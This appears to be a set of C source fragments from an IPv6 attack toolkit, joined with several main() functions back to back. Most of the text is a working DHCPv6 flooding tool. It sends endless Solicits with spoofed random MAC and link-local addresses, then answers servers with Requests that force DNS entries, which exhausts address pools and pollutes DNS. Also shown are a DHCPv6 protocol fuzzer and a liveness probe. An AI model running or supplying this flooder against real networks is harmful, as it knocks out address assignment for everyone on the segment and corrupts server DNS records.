void check_packets(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, pkt_len = 0, mlen = 10, olen; unsigned char *ptr = (unsigned char *) data, *pkt = NULL; char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e }; char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 }; if (len < 140 || data[20] != NXT_UDP || data[62] != 2) return; data += 62; len -= 62; memcpy(mybuf + 1, data + 1, 3); data += 4; len -= 4; while (len >= 4) { if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) { printf("Information: evil packet received\n"); olen = 0; len = -1; } else { if (data[1] > 1 && data[1] <= 3) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; } else if (data[1] == 1) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; //smac auf client mac in paket setzen if (olen == 14) smac = (char *) (data + 12); else smac = mac; } else if (data[1] == 39 && do_dns) { memcpy(mybuf + mlen, data, olen + 4); mybuf[mlen + 4] = 1; // force server to write dns entry mlen += olen + 4; } data += olen + 4; len -= olen + 4; if (len < 0) { printf("Information: evil packet received\n"); len = -1; } } } if (len >= 0) { counter++; if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ptr + 38, ptr + 22, 1, 0, 0, 0, 0)) == NULL) return; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0) return; if (thc_generate_and_send_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0) return; pkt = thc_destroy_packet(pkt); if (counter % 100 == 0) printf("!"); } }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; char wdatabuf[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0, dlen = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 0, use_real_link = 0; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "d:nNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; break; case 'd': do_dns = 1; dns_name = optarg; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); if (argc - optind <= 1) dst = thc_resolve6("ff02::1:2"); else dst = thc_resolve6(argv[optind + 1]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (src == NULL || mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface); exit(-1); } // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); } printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface); while (1) { count++; if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); pkt = thc_destroy_packet(pkt); if (do_all) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (count % 1000 == 0) printf("."); } return 0; // never reached }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL; char wdatabuf[1024], wdatabuf2[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, len2, pkt_len = 0, pkt2_len = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 1, use_real_link = 1; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "dnNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); len2 = sizeof(inforeq); memcpy(wdatabuf2, inforeq, len2); printf("Sending DHCPv6 Solicitate message ...\n"); printf("Sending DHCPv6 Information Request message ...\n"); if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); if (!use_real_mac) memcpy(wdatabuf2 + 18, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0) printf("!"); signal(SIGALRM, clean_exit); alarm(3); // i = thc_send_pkt(interface, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); while (1) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } return 0; // never reached }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; // defines mac as 6 pieces and defines pkt as null. char wdatabuf[1024]; //builds data buffer and sets memory size at 1024mb unsigned char *mac6 = mac, *src, *dst; //creates mac6 address usuing int i, s, len, pkt_len = 0, dlen = 0; int do_all = 1, use_real_mac = 1, use_real_link = 1; int state; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); //Parse options while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) { switch (i) { case '1': do_type = DO_SOL; break; case '2': do_type = DO_REQ; break; case '3': do_type = DO_CON; break; case '4': do_type = DO_REN; break; case '5': do_type = DO_REB; break; case '6': do_type = DO_REL; break; case '7': do_type = DO_DEC; break; case '8': do_type = DO_INF; break; case 'm': fuzz_msg_type = 1; break; case 'n': no_send = atoi(optarg); break; case 't': test_start = atoi(optarg); break; case 'e': test_end = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'F': use_real_link = 0; // no break case 'f': use_real_mac = 0; break; case 'p': ping = atoi(optarg); break; case 'd': do_dns = 1; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } //Check options if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (test_end < test_start) { printf("don't f**k up the command line options!\n"); exit(-1); } memset(mac, 0, sizeof(mac)); interface = argv[optind]; dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) { mac6 = thc_get_own_mac(interface); memcpy(mac, mac6, sizeof(mac)); } dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } //Establish state if (do_type == DO_SOL || do_type == DO_REB) state = STATELESS; else state = STATEFULL; // generate full fuzz mask for stateless types and partial for statefull types strcpy(fuzzbuf, fuzztype_ether); strcat(fuzzbuf, fuzztype_ip6); strcat(fuzzbuf, fuzztype_udp); if (fuzz_msg_type) strcat(fuzzbuf, fuzztype_dhcp6); else strcat(fuzzbuf, fuzztype_dhcp6no); if (state == STATELESS) { strcat(fuzzbuf, fuzztype_elapsed_time); strcat(fuzzbuf, fuzztype_client_identifier); strcat(fuzzbuf, fuzztype_IA_NA); if (do_dns) strcat(fuzzbuf, fuzztype_FQDN); } /** Generate packet **/ len = sizeof(solicit); memcpy(wdatabuf, solicit, len); //Add dns option if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); dns_option_hdr_len += sizeof(dnsupdate1); //Append domain string prefix fuzz mask if (state == STATELESS) { //<-- Do fuzzbuffer later for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix strcat(fuzzbuf, "B"); } if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; dns_option_hdr_len += strlen(dns_name) + 1; //Append variable length domain string suffix fuzz mask if (state == STATELESS) { for (i = 0; i < strlen(dns_name) + 1; ++i) strcat(fuzzbuf, "B"); } } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); dns_option_hdr_len += sizeof(dnsupdate2); //Append option request (FQDN request) fuzz mask if (state == STATELESS){ strcat(fuzzbuf, fuzztype_option_request); } } //Set message type if (state == STATELESS) { switch (do_type) { case DO_SOL: wdatabuf[0] = 0x01; break; case DO_REB: wdatabuf[0] = 0x06; break; default: break; } } //random src mac if (!use_real_link) for (i = 0; i < 8; i++) src[i + 8] = rand() % 256; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; if (!use_real_mac) { mac[i * 2] = rand() % 256; mac[i * 2 + 1] = rand() % 256; } if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } memcpy(wdatabuf + 22, mac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; //Fuzz solicit packet if (state == STATELESS) { if (fuzz_loop(pkt, &pkt_len) < 0) return -1; } //Fuzz request, confirm or renew paket else if (state == STATEFULL) { //Send a dhcp solicit to discover dhcpv6 servers if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to send initial solicit packet\n"); return -1; } usleep(75); //<-- I don't really know why this is neccessary but it seems to be //Construct and fuzz packets using server identifier got_packet = 0; time_t start_time = time(NULL); while(time(NULL) - start_time < timeout) { while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function if (got_packet) break; } if (!got_packet) fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n"); } pkt = thc_destroy_packet(pkt); // printf("fuzzbuf: %s\n", fuzzbuf); return 0; }
void construct_from_adv_and_fuzz(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, pkt_len = 0, mlen = 10, olen; unsigned char *ptr = (unsigned char *) data, *pkt = NULL; char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e }; char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 }; int done_dns = 0, i; //Begin fuzz buffer strcat(fuzzbuf, fuzztype_elapsed_time); //Set message type switch (do_type) { case DO_REQ: mybuf[0] = 0x03; break; case DO_CON: mybuf[0] = 0x04; break; case DO_REN: mybuf[0] = 0x05; break; case DO_REL: mybuf[0] = 0x08; break; case DO_DEC: mybuf[0] = 0x09; break; case DO_INF: mybuf[0] = 0x0B; break; default: fprintf(stderr, "Error: Unknown do type %d\n", do_type); exit(-1); break; } //Skip over header to dhcp header if (do_hdr_size) { data += do_hdr_size; len -= do_hdr_size; if ((data[0] & 240) != 0x60) return; } else { data += 14; len -= 14; } if (len < 126 || data[6] != NXT_UDP || data[48] != 2) return; data += 48; len -= 48; //Copy transaction id and skip to message options memcpy(mybuf + 1, data + 1, 3); data += 4; len -= 4; //Loop over options till reach end of header while (len >= 4) { //Set olen to the option length minus type and length fields and check for bogus packet if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) { //the 4 here is the 4 bytes for the option type and option length fields printf("Information: evil packet received\n"); olen = 0; len = -1; } else { //Copy server identifier or IA_NA to message if (data[1] > 1 && data[1] <= 3 && !(data[1] == 2 && do_type == DO_CON) && !(data[1] == 3 && do_type == DO_INF)) { //skip copying server identifier for confirm or IA_NA for information request messages memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; //Append server identifier fuzzing if (data[1] == 2) strcat(fuzzbuf, fuzztype_server_identifier); //Append IA_NA fuzzing + IA Address fuzzing else if (data[1] == 3) { strcat(fuzzbuf, fuzztype_IA_NA); if (olen > 12) strcat(fuzzbuf, fuzztype_IA_Address); } // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); } //Copy client identifier to message else if (data[1] == 1) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; //smac auf client mac in paket setzen if (olen == 14) smac = (char *) (data + 12); else smac = mac; //Append client identifier fuzzing strcat(fuzzbuf, fuzztype_client_identifier); // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); } //Copy dns option else if (data[1] == 39 && do_dns) { memcpy(mybuf + mlen, data, olen + 4); mybuf[mlen + 4] = 1; // force server to write dns entry mlen += olen + 4; //Append dns fuzzing strcat(fuzzbuf, fuzztype_FQDN); for (i = 0; i < olen - 1; ++i) strcat(fuzzbuf, "B"); //Fuzz the domain name string strcat(fuzzbuf, fuzztype_option_request); // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); //Make sure we don't add dns twice done_dns = 1; } data += olen + 4; len -= olen + 4; if (len < 0) { printf("Information: evil packet received\n"); len = -1; } } } //Add saved dns option onto this packet if (do_dns && !done_dns) { memcpy(mybuf + mlen, dns_option_hdr, dns_option_hdr_len); mlen += dns_option_hdr_len; //Append dns fuzzing olen = dns_option_hdr[2] * 256 + dns_option_hdr[3]; strcat(fuzzbuf, fuzztype_FQDN); for (i = 0; i < olen - 1; ++i) strcat(fuzzbuf, "B"); //Fuzz the domain name string strcat(fuzzbuf, fuzztype_option_request); // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); } //Build and send fuzzed message packets if (len >= 0) { unsigned char* dst = thc_resolve6("ff02::1:2"); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ptr + 38, dst, 1, 0, 0, 0, 0)) == NULL) { fprintf(stderr, "Error: Couldn't create dhcp requests ipv6 header\n"); exit(-1); } if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0) { fprintf(stderr, "Error: Couldn't create dhcp requests udp header\n"); exit(-1); } if (thc_generate_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Couldn't create dhcp requests ethernet header\n"); exit(-1); } if (fuzz_loop(pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Fuzzing request packet failed\n"); exit(-1); } else { got_packet = 1; //Used to suppress timeout error } pkt = thc_destroy_packet(pkt); } //Truncate the fuzz buffer back to it's original length fuzzbuf[66] = 0; // printf("Trunc fuzzbuf: %s\n", fuzzbuf); }
int check_alive(pcap_t * p) { int ret = -2, len, pkt_len = 0, i; time_t t; char wdatabuf[1024]; char *pkt = NULL; unsigned char *dst = thc_resolve6("ff02::1:2"); unsigned char *mac6 = thc_get_own_mac(interface); len = sizeof(solicit); memcpy(wdatabuf, solicit, len); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; } memcpy(wdatabuf + 22, mac6, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 1, 0, 0, 0, 0)) == NULL) { fprintf(stderr, "Error: Failed to create check allive ivp6 packet header\n"); exit(-1); } if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) { fprintf(stderr, "Error: Failed to create check allive udp packet header\n"); exit(-1); } if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to create check allive packet header\n"); exit(-1); } // debug = 1; //Empty packet capture queue while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); //Send initial solicit request try_send_pkt(interface, pkt, &pkt_len); //Check for response in loop and timeout if we don't get one t = time(NULL); while (ret < 0) { //Got reply packet; server alive! if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) ret = 1; //If we still haven't received a packet after 1 second resend the solicit if (time(NULL) > t + 1 && ret == -2) { if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { //Don't want to use try_send_pkt as it could take longer than timeout usleep(75); thc_send_pkt(interface, pkt, &pkt_len); //Retry sending packet after short time if sending failed } ret = -1; } //Fail after 4 seconds if (time(NULL) > t + timeout && ret < 0) ret = 0; } if (ret == 0) { fprintf(stderr, "Timeout: Failed to receive dhcp solicitation replay in check alive function within %d seconds\n", timeout); } // debug = 0; thc_destroy_packet(pkt); return ret > 0 ? 1 : 0; }